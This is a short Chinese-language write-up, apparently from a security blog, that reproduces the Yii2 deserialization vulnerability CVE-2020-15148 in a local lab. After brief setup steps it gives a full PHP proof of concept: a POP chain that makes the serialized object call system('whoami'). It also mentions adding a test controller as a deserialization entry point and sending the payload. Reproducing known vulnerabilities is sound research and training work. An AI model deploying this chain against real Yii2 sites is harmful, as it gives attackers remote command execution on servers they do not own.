Yii2反序列化(CVE-2020-15148)复现
为了方便安装,直接在github(https://github.com/yiisoft/yii2)下载一个release的低版本,然后解压tgz文件到phpstudy的www的目录下,命名为Yii2:
需要注意的是,php拓展需要勾选openssl,然后再执行php init安装Yii2,否则会报错,安装完成后访问一下,证明就安装成功了:
POC:
<?php
namespace yii\db;
class BatchQueryResult extends \yii\base\BaseObject{
private $_dataReader;
public function __construct()
{
$this->_dataReader=new \Faker\Generator();
}
}
namespace yii\base;
class BaseObject{
}
namespace yii\rest;
class Action{
public $checkAccess='system';
public $id='whoami';
}
class IndexAction extends Action{
}
namespace Faker;
class Generator{
protected $formatters = array();
public function __construct()
{
$this->formatters['close']=[(new \yii\rest\IndexAction()),"run"];
}
}
use \yii\db\BatchQueryResult;
$c=new BatchQueryResult();
print(serialize($c));
pop链师傅们已经分析好了,还需要自己构造一个反序列化的入口,在controllers下新建一个TestController.php:
先测试下:
然后发送payload:
参考链接:
https://mp.weixin.qq.com/s/NHBpF446yKQbRTiNQr8ztA
https://github.com/yiisoft/yii2/